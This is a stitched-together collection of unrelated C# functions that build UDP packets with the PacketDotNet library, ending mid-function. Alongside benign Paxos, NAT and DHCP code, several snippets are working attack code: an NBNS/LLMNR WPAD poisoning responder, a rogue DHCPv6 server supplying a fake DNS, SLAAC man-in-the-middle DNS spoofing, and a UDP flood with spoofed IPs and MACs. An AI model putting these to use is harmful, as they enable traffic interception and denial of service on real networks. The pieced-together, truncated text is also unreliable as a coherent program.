private void acceptor(ref UdpPacket udp_p, ref Paxos_Packet paxos_p) { switch (paxos_p.MsgType) { case ((ushort)Phase.Paxos_1A): paxos_p.MsgType = (ushort)Phase.Paxos_1B; paxos_p.Voted_Round = vrounds_register[paxos_p.Instance]; paxos_p.Value = value_register[paxos_p.Instance]; paxos_p.Accept_ID = datapath_id; rounds_register[paxos_p.Instance] = paxos_p.Voted_Round; udp_p.DestinationPort = Paxos.Learner_Port; udp_p.UpdateUDPChecksum(); break; case ((ushort)Phase.Paxos_2A): paxos_p.MsgType = (ushort)Phase.Paxos_2B; rounds_register[paxos_p.Instance] = paxos_p.Round; vrounds_register[paxos_p.Instance] = paxos_p.Round; value_register[paxos_p.Instance] = paxos_p.Value; paxos_p.Accept_ID = datapath_id; udp_p.DestinationPort = Paxos.Learner_Port; udp_p.UpdateUDPChecksum(); break; default: throw (new Exception("Unknown Paxos phase")); } }
override public ForwardingDecision process_packet(int in_port, ref Packet packet) { if (packet is EthernetPacket && packet.Encapsulates(typeof(IPv4Packet), typeof(UdpPacket), typeof(Paxos_Packet))) { IpPacket ip_p = ((IpPacket)(packet.PayloadPacket)); UdpPacket udp_p = ((UdpPacket)(ip_p.PayloadPacket)); if (udp_p.DestinationPort == Paxos.Paxos_Coordinator_Port) { Paxos_Packet paxos_p = ((Paxos_Packet)(udp_p.PayloadPacket)); instance_register++; paxos_p.Instance = instance_register; udp_p.DestinationPort = Paxos.Paxos_Acceptor_Port; udp_p.UpdateUDPChecksum(); // NOTE we could use "udp_p.Checksum = 0" to // follows the P4 implementation, // avoiding the (optional) UDP checksum. // Same applies to instances of // checksum-setting below. } } // We assume that we receive from in_port and send to in_port+1. // NOTE that we implicitly forward all non-Paxos packets onwards, // unmmodified. The downstream processor then decides how to forward // them along the network. return(new ForwardingDecision.SinglePortForward(in_port + 1)); }
/// <summary> /// Fires off on a seperate thread when a packet is available /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private void ProcessPacket(RawCapture incoming) { try { Packet packet = Packet.ParsePacket(LinkLayers.Ethernet, incoming.Data); EthernetPacket ethSrc = (EthernetPacket)packet.Extract(typeof(EthernetPacket)); IPv4Packet ipSrc = (IPv4Packet)packet.Extract(typeof(IPv4Packet)); if (ipSrc.Protocol == IPProtocolType.UDP) { UdpPacket udpSrc = (UdpPacket)packet.Extract(typeof(UdpPacket)); // From RFC 1002 Section 4.2.1.1 // Need to grab the transaction id for the reply UInt16 namedTrnId = BitConverter.ToUInt16(udpSrc.PayloadData, 0); // Looking for Response = query(0), OpCode = Query(0) // 11000000 00000000 UInt16 flags = Utility.ReverseUInt16(BitConverter.ToUInt16(udpSrc.PayloadData, 2)); if ((flags & 0xc000) == 0) { // Grab the name and make sure it's WPAD string name = Encoding.Default.GetString(udpSrc.PayloadData, 12, 34); if (Utility.DecodeName(name) == WpadHostName) { Logger.AddToInfoView("Received NBNS query for {0} from {1}", WpadHostName, ethSrc.SourceHwAddress); UdpPacket udpDst = new UdpPacket(NetbiosPort, NetbiosPort); udpDst.PayloadData = SetupResponse(namedTrnId, GetDeviceIp(this.Device)); IPv4Packet ipDst = new IPv4Packet(GetDeviceIp(this.Device), ipSrc.SourceAddress); ipDst.PayloadPacket = udpDst; udpDst.UpdateCalculatedValues(); udpDst.UpdateUDPChecksum(); ipDst.UpdateCalculatedValues(); ipDst.UpdateIPChecksum(); EthernetPacket ethDst = new EthernetPacket(this.Device.MacAddress, ethSrc.SourceHwAddress, EthernetPacketType.IpV4); ethDst.PayloadPacket = ipDst; ethDst.UpdateCalculatedValues(); Logger.AddToInfoView("Sending poisoned response for {0}", WpadHostName); this.Device.SendPacket(ethDst.Bytes); } } } else if (ipSrc.Protocol == IPProtocolType.TCP) { TcpPacket tcpSrc = (TcpPacket)packet.Extract(typeof(TcpPacket)); if (tcpSrc.Syn) { Logger.AddToInfoView("SYN sent {0}:{1}", ipSrc.DestinationAddress, tcpSrc.SourcePort); } } } catch (Exception ex) { Logger.AddToErrorView("OnPacketArrival", ex); } }
public static Packet BuildPacket(int vlanID, EthernetPacket ePacket, IPv4Packet iPacket, UdpPacket uPacket, byte[] udpData) { uPacket.PayloadData = udpData; iPacket.PayloadPacket = uPacket; iPacket.UpdateIPChecksum(); uPacket.UpdateUDPChecksum(); return(BuildPacket(vlanID, ePacket, iPacket)); }
public void GenerateLLMNRResponse(Packet packet) { try { LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData); if (llmnr.Query.Name.ToLower().Equals("wpad") && llmnr.Query.Type.Value == LLMNR.DNSType.A) { WinPcapDevice dev = Program.CurrentProject.data.GetDevice(); IPAddress ip = Program.CurrentProject.data.GetIPv4FromDevice(dev); byte[] ipv4Addr = ip.GetAddressBytes(); llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.A, RData = ipv4Addr, RDLength = (short)ipv4Addr.Length, TTL = 12 }); llmnr.IsResponse = true; EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV4); IPv4Packet ipv4Dns = new IPv4Packet(ip, ((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv4Dns.PayloadPacket = udpDns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv4Dns.UpdateIPChecksum(); ipv4Dns.UpdateCalculatedValues(); ethDns.PayloadPacket = ipv4Dns; Program.CurrentProject.data.SendPacket(ethDns); } } catch (Exception) { } }
public Packet GetSendPacket(PhysicalAddress sourceMAC, IPAddress sourceIPAddress) { // EthernetPacket ePacket = new EthernetPacket(PhysicalAddress.Parse("00-E0-4C-68-02-91"), PhysicalAddress.Parse("33-33-00-01-00-02"), EthernetPacketType.IpV6); // IPv6Packet ipPacket = new IPv6Packet(IPAddress.Parse("fe80::1c66:e750:c259:df88"), IPAddress.Parse("ff02::1:2")); EthernetPacket ePacket = new EthernetPacket(sourceMAC, PhysicalAddress.Parse("33-33-00-01-00-02"), EthernetPacketType.IpV6); IPv6Packet ipPacket = new IPv6Packet(sourceIPAddress, IPAddress.Parse("ff02::1:2")); ePacket.PayloadPacket = ipPacket; UdpPacket udpPacket = new UdpPacket(SOURCE_PORT, DEST_PORT); udpPacket.PayloadData = AddOtherOptions(DhcpV6MessagePacket).Encode().getAllBytes(); udpPacket.UpdateCalculatedValues(); ipPacket.PayloadPacket = udpPacket; udpPacket.UpdateUDPChecksum(); Console.WriteLine("Send Type({0}) transactionID:{1:X} ", DhcpV6MessagePacket.GetMessageType().ToString(), DhcpV6MessagePacket.GetTransactionId()); return(ePacket); }
private void processUdpFlood(Object Params) { AttackParams _params = Params as AttackParams; if (_params.UdpFloodEnabled) { NetworkInstruments.IpRandomizer IpSpoofer = new NetworkInstruments.IpRandomizer(); PhysicalAddress TargetMac = NetworkInstruments.ResolveMac(Adapter, _params.Target.Address); ICaptureDevice ActiveDevice = NetworkInstruments.getActiveDevice(Adapter.GetPhysicalAddress()); ActiveDevice.Open(); UdpPacket udpPacket = new UdpPacket(0, 80); IPv4Packet ipPacket = new IPv4Packet(IPAddress.Any, _params.Target.Address); ipPacket.Protocol = IPProtocolType.UDP; ipPacket.PayloadPacket = udpPacket; if (TargetMac == null) { ErrorHandler(1, "Can not get MAC target address"); return; } ; //unable to resolve mac EthernetPacket ethernetPacket = new EthernetPacket(Adapter.GetPhysicalAddress(), TargetMac, EthernetPacketType.None); ethernetPacket.PayloadPacket = ipPacket; while (Attacking) { udpPacket.SourcePort = (ushort)Randomizer.Next(1, 49160); udpPacket.DestinationPort = (ushort)Randomizer.Next(1, 49160); udpPacket.PayloadData = new byte[Randomizer.Next(500)]; Randomizer.NextBytes(udpPacket.PayloadData); udpPacket.UpdateCalculatedValues(); ipPacket.SourceAddress = IpSpoofer.GetNext(ref Randomizer, _params.RestrictedPool); ipPacket.TimeToLive = Randomizer.Next(20, 128); ipPacket.UpdateCalculatedValues(); ipPacket.UpdateIPChecksum(); ethernetPacket.SourceHwAddress = NetworkInstruments.GetRandomMac(ref Randomizer); ethernetPacket.UpdateCalculatedValues(); udpPacket.UpdateUDPChecksum(); ActiveDevice.SendPacket(ethernetPacket); udpCounter++; } } }
// IPv4 + UDP数据包封装函数 private EthernetPacket UdPonIPv4PacketMaker() { // Ether封包 var ether = new EthernetPacket(PhysicalAddress.Parse(MakeMaCaddr(SourceMAC1.Text, SourceMAC2.Text, SourceMAC3.Text, SourceMAC4.Text, SourceMAC5.Text, SourceMAC6.Text)), PhysicalAddress.Parse(MakeMaCaddr(DestMAC1.Text, DestMAC2.Text, DestMAC3.Text, DestMAC4.Text, DestMAC5.Text, DestMAC6.Text)), EthernetPacketType.IPv4); // UDP封包 var udp = new UdpPacket(Convert.ToUInt16(SourcePortTextBox.Text), Convert.ToUInt16(DestPortTextBox.Text)); if (PayloadTextBox.Text.Length != 0) { udp.PayloadData = Encoding.ASCII.GetBytes(PayloadTextBox.Text); } udp.UpdateCalculatedValues(); // IPv4封包 var IPv4 = new IPv4Packet(IPAddress.Parse(MakeIPaddr(SourceIP1.Text, SourceIP2.Text, SourceIP3.Text, SourceIP4.Text)), IPAddress.Parse(MakeIPaddr(DestIP1.Text, DestIP2.Text, DestIP3.Text, DestIP4.Text))) { TimeToLive = Convert.ToInt32(TTLTextBox.Text), Protocol = IPProtocolType.UDP, Version = IPVersion.IPv4, FragmentFlags = Convert.ToInt16(FragmentFlagsTextBox.Text), FragmentOffset = Convert.ToInt32(FragmentOffsetTextBox.Text), TypeOfService = Convert.ToInt32(TOSTextBox.Text), Id = Convert.ToUInt16(IdentifierTextbox.Text), PayloadPacket = udp }; ether.PayloadPacket = IPv4; IPv4.ParentPacket = ether; IPv4.UpdateIPChecksum(); udp.ParentPacket = IPv4; udp.UpdateUDPChecksum(); return(ether); }
private void SendRequest() { try { m_IStatusUpdate.UpdateStatus("Assembling DHCP Request Packet"); DHCPRequest DhcpRequest = new DHCPRequest(); AssembleRequest(ref DhcpRequest); string destHwAddress = "FFFFFFFFFFFF"; var dest = System.Net.NetworkInformation.PhysicalAddress.Parse(destHwAddress); EthernetPacket packet = new EthernetPacket(m_Device.Interface.MacAddress, dest, EthernetPacketType.IpV4); packet.Type = EthernetPacketType.IpV4; var ipSourceAddress = System.Net.IPAddress.Parse("0.0.0.0"); var ipDestinationAddress = System.Net.IPAddress.Parse("255.255.255.255"); var ipPacket = new IPv4Packet(ipSourceAddress, ipDestinationAddress); UdpPacket udpPacket = new UdpPacket(67, 68); byte[] payload = StructureToByteArray(DhcpRequest); ipPacket.Version = IpVersion.IPv4; udpPacket.PayloadData = payload; ipPacket.PayloadPacket = udpPacket; packet.PayloadPacket = ipPacket; udpPacket.UpdateUDPChecksum(); ipPacket.UpdateIPChecksum(); m_IStatusUpdate.UpdateStatus("Sending DHCP Discover"); m_Device.SendPacket(packet); m_IStatusUpdate.UpdateStatus("Sent DHCP Discover"); } catch (Exception) { m_IStatusUpdate.UpdateStatus("Failed to send DHCP Request"); } }
/* * public EthernetPacketType deNAT_outgoing_packet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC) * { * EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data); * if (!isIpOrArpPacket(ethernet_packet_type)) * return ethernet_packet_type; * xbs_nat_entry nat_entry = null; * lock (NAT_list) * { * if (NAT_list.ContainsKey(dstMAC)) * nat_entry = NAT_list[dstMAC]; * } * * if (nat_entry != null) * { * replaceDestinationIpWithOriginalIP(ref data, ethernet_packet_type, ref nat_entry); * updateIPChecksums(ref data); * } * return ethernet_packet_type; * } */ public EthernetPacketType deNAT_outgoing_packet_PacketDotNet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC) { EthernetPacket p = (EthernetPacket)EthernetPacket.ParsePacket(LinkLayers.Ethernet, data); EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data); IPv4Packet p_IPV4 = null; ARPPacket p_ARP = null; bool packet_changed = false; if (ethernet_packet_type == EthernetPacketType.IpV4) { p_IPV4 = (IPv4Packet)p.PayloadPacket; } else if (ethernet_packet_type == EthernetPacketType.Arp) { p_ARP = (ARPPacket)p.PayloadPacket; } else { return(ethernet_packet_type); } xbs_nat_entry nat_entry = null; lock (NAT_list) { if (dstMAC.Equals(broadcast_mac)) { if (p_ARP != null) { foreach (xbs_nat_entry ne in NAT_list.Values) { if (ne.natted_source_ip.Equals(p_ARP.TargetProtocolAddress)) { nat_entry = ne; break; } } } } else if (NAT_list.ContainsKey(dstMAC)) { nat_entry = NAT_list[dstMAC]; } } #if DEBUG if (nat_entry != null) { xbs_messages.addDebugMessage("% found device in deNAT list: " + dstMAC + " " + nat_entry.natted_source_ip + "=>" + nat_entry.original_source_ip, xbs_message_sender.NAT); } #endif if (nat_entry != null) { if (p_IPV4 != null) { p_IPV4.DestinationAddress = nat_entry.original_source_ip; p_IPV4.UpdateIPChecksum(); if (p_IPV4.Protocol == IPProtocolType.UDP) { UdpPacket p_UDP = (UdpPacket)p_IPV4.PayloadPacket; if (NAT_enablePS3mode) { bool ret = PS3_replaceClientAnswer_hostAddr(dstMAC, ref p_UDP, nat_entry.original_source_ip, nat_entry.natted_source_ip); } p_UDP.UpdateUDPChecksum(); packet_changed = true; } else if (p_IPV4.Protocol == IPProtocolType.TCP) { ((TcpPacket)p_IPV4.PayloadPacket).UpdateTCPChecksum(); packet_changed = true; } } else if (p_ARP != null) { p_ARP.TargetProtocolAddress = nat_entry.original_source_ip; packet_changed = true; } } if (packet_changed) { data = p.BytesHighPerformance.ActualBytes(); } return((packet_changed) ? ethernet_packet_type : EthernetPacketType.None); }
/* * public EthernetPacketType NAT_incoming_packet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC) * { * EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data); * if (!isIpOrArpPacket(ethernet_packet_type)) * return ethernet_packet_type; * xbs_nat_entry nat_entry; * lock (NAT_list) * { * if (!NAT_list.TryGetValue(srcMAC, out nat_entry)) * { * IPAddress sourceIP = getSourceIPFromRawPacketData(ref data, ethernet_packet_type); * if (sourceIP.Equals(ip_zero)) * return ethernet_packet_type; * IPAddress destinationIP = getDestinationIPFromRawPacketData(ref data, ethernet_packet_type); * nat_entry = ip_pool.requestIP( sourceIP, srcMAC ); * if (nat_entry == null) * { * xbs_messages.addInfoMessage("!! % out of NAT IPs. Could not nat incoming packet"); * return ethernet_packet_type; * } * NAT_list.Add(srcMAC, nat_entry); #if DEBUG * xbs_messages.addDebugMessage("% new device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip); #endif * } * else * { #if DEBUG * xbs_messages.addDebugMessage("% found device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip); #endif * } * } * replaceSourceIpWithNATSourceIP(ref data, ethernet_packet_type, ref nat_entry); * if (ethernet_packet_type == EthernetPacketType.IpV4) * { * if (dstMAC.Equals(broadcast_mac) && nat_entry.natted_broadcast!=null) * replaceBroadcastIPAddress(ref data, ref nat_entry.natted_broadcast_bytes); * updateIPChecksums(ref data); * } * return ethernet_packet_type; * } */ public EthernetPacketType NAT_incoming_packet_PacketDotNet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC, ref Packet p, ref IPv4Packet p_IPV4, ref ARPPacket p_ARP) { xbs_nat_entry nat_entry; EthernetPacketType p_type = ((EthernetPacket)p).Type; if (p_type != EthernetPacketType.IpV4 && p_type != EthernetPacketType.Arp) { return(p_type); } lock (NAT_list) { if (!NAT_list.TryGetValue(srcMAC, out nat_entry)) { IPAddress sourceIP = (p_IPV4 != null) ? p_IPV4.SourceAddress : p_ARP.SenderProtocolAddress; if (sourceIP.Equals(ip_zero)) { return(p_type); } IPAddress destinationIP = (p_IPV4 != null) ? p_IPV4.DestinationAddress : p_ARP.TargetProtocolAddress; nat_entry = ip_pool.requestIP(sourceIP, srcMAC); if (nat_entry == null) { if (!natIPpoolOverflow_warning_shown) { natIPpoolOverflow_warning_shown = true; xbs_messages.addInfoMessage("!! % out of NAT IPs. Could not NAT incoming packet", xbs_message_sender.NAT, xbs_message_type.WARNING); } return(p_type); } else { natIPpoolOverflow_warning_shown = false; NAT_list.Add(srcMAC, nat_entry); #if DEBUG xbs_messages.addDebugMessage("% new device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip, xbs_message_sender.NAT); #endif } } else { #if DEBUG xbs_messages.addDebugMessage("% found device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip, xbs_message_sender.NAT); #endif } } if (p_IPV4 != null) { p_IPV4.SourceAddress = nat_entry.natted_source_ip; if (dstMAC.Equals(broadcast_mac) && nat_entry.natted_broadcast != null) { p_IPV4.DestinationAddress = nat_entry.natted_broadcast; } p_IPV4.UpdateIPChecksum(); if (p_IPV4.Protocol == IPProtocolType.UDP) { UdpPacket p_UDP = (UdpPacket)p_IPV4.PayloadPacket; if (NAT_enablePS3mode) { bool ret = PS3_replaceInfoResponse_hostAddr(dstMAC, ref p_UDP, nat_entry.natted_source_ip); if (!ret) { ret = PS3_replaceClientAnswer_hostAddr(dstMAC, ref p_UDP, nat_entry.natted_source_ip, nat_entry.original_source_ip); } } p_UDP.UpdateUDPChecksum(); } else if (p_IPV4.Protocol == IPProtocolType.TCP) { ((TcpPacket)p_IPV4.PayloadPacket).UpdateTCPChecksum(); } } else { p_ARP.SenderProtocolAddress = nat_entry.natted_source_ip; } data = p.BytesHighPerformance.ActualBytes(); return(p_type); }
unsafe public void AnalyzePacket(WinPcapDevice device, Packet p) { if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket)) { return; } UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket; if (udp.ParentPacket == null) { return; } if (!(udp.ParentPacket is IPv6Packet)) { return; } if (attacks.Where(A => A.attackType == AttackType.DHCPIpv6).Count() == 0) { return; } DhcpIPv6 attack = (DhcpIPv6)attacks.Where(A => A.attackType == AttackType.DHCPIpv6).First(); IPv6Packet packetIpLayer = (IPv6Packet)udp.ParentPacket; EthernetPacket ethernet = (EthernetPacket)p; /* * Info: http://en.wikipedia.org/wiki/DHCPv6 * Example * In this example, the server's link-local address is fe80::0011:22ff:fe33:5566/64 and the client's link-local address is fe80::aabb:ccff:fedd:eeff/64. * DHCPv6 client sends a Solicit from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. * DHCPv6 server replies with an Advertise from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546. * DHCPv6 client replies with a Request from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. (All client messages are sent to the multicast address, per section 13 of RFC 3315.) * DHCPv6 server finishes with a Reply from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546. */ DHCPv6Packet pa = new DHCPv6Packet(); pa.ParsePacket(udp.PayloadData); if (packetIpLayer.DestinationAddress.Equals(IPAddress.Parse("ff02::1:2"))) { EthernetPacket newPEthernet = new EthernetPacket(device.Interface.MacAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV6); UdpPacket newUDP = null; IPAddress ipv6LocalLink = null; IPv6Packet newIpv6 = null; switch (pa.MessageType) { case DHCPv6Type.Solicit: if (pa.Options.ContainsKey(DHCPv6OptionCode.ClientIdentifier) && pa.Options.ContainsKey(DHCPv6OptionCode.IANA)) { newUDP = new UdpPacket(547, 546); byte[] iaid = pa.Options[DHCPv6OptionCode.IANA].Value; pa.MessageType = DHCPv6Type.Advertise; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.IANA); pa.AddServerIdentifierOption(device.MacAddress); pa.AddIANAOption(IPAddress.Parse(string.Format("{0}:{1}", attack.fakeIPRange.ToString().Substring(0, attack.fakeIPRange.ToString().LastIndexOf(':')), IpID)), iaid); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); IpID++; newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); } break; case DHCPv6Type.Request: newUDP = new UdpPacket(547, 546); pa.MessageType = DHCPv6Type.Reply; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.DNS); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); break; case DHCPv6Type.InformationRequest: newUDP = new UdpPacket(547, 546); pa.MessageType = DHCPv6Type.Reply; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.IANA); pa.AddServerIdentifierOption(device.MacAddress); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); break; default: break; } } }
private void DNSCheck(Packet p) { EthernetPacket ethernet = (EthernetPacket)p; if (p.PayloadPacket.PayloadPacket is UdpPacket) { UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket; attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack => { MitmAttack mitmAttack = currentAttack as MitmAttack; if (p.PayloadPacket is IPv6Packet) { switch (udp.DestinationPort) { case 53: Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData); var aaaaDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A select q).ToList(); //Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A. var aTeredoDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.A && (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi")) select q).ToList(); if (aaaaDns != null && aaaaDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } else if (aTeredoDns != null && aTeredoDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; case 5355: LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(udp.PayloadData); if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA) { IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name) where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork select ip).ToArray(); byte[] ipv6Addr = new byte[] { 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, (byte)ips[0].GetAddressBytes()[0], (byte)ips[0].GetAddressBytes()[1], (byte)ips[0].GetAddressBytes()[2], (byte)ips[0].GetAddressBytes()[3] }; llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.AAAA, RData = ipv6Addr, RDLength = (short)ipv6Addr.Length }); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; default: break; } } }); } }
public static Packet CreatePacket(Param param) { Packet ret = null; //create layer 4 if (param.packetType == Param.PacketType.TCP) { TcpPacket tcpPacket = new TcpPacket(param.sPort, param.dPort); tcpPacket.AllFlags = param.tcpFlag; if (param.dIP.ToString().Contains(".")) { IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ipPacket.PayloadPacket = tcpPacket; tcpPacket.PayloadData = param.payload; ret.PayloadPacket = ipPacket; ipPacket.UpdateCalculatedValues(); ipPacket.UpdateIPChecksum(); tcpPacket.Checksum = (ushort)tcpPacket.CalculateTCPChecksum(); } else { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ipPacket.PayloadPacket = tcpPacket; tcpPacket.PayloadData = param.payload; ret.PayloadPacket = ipPacket; } } else if (param.packetType == Param.PacketType.UDP) { UdpPacket udpPacket = new UdpPacket(param.sPort, param.dPort); if (param.dIP.ToString().Contains(".")) { IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ipPacket.PayloadPacket = udpPacket; udpPacket.PayloadData = param.payload; udpPacket.UpdateUDPChecksum(); ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length); ipPacket.UpdateIPChecksum(); ret.PayloadPacket = ipPacket; } else { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ipPacket.PayloadPacket = udpPacket; udpPacket.PayloadData = param.payload; udpPacket.UpdateUDPChecksum(); ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length); ret.PayloadPacket = ipPacket; } } else if (param.packetType == Param.PacketType.ICMP) { 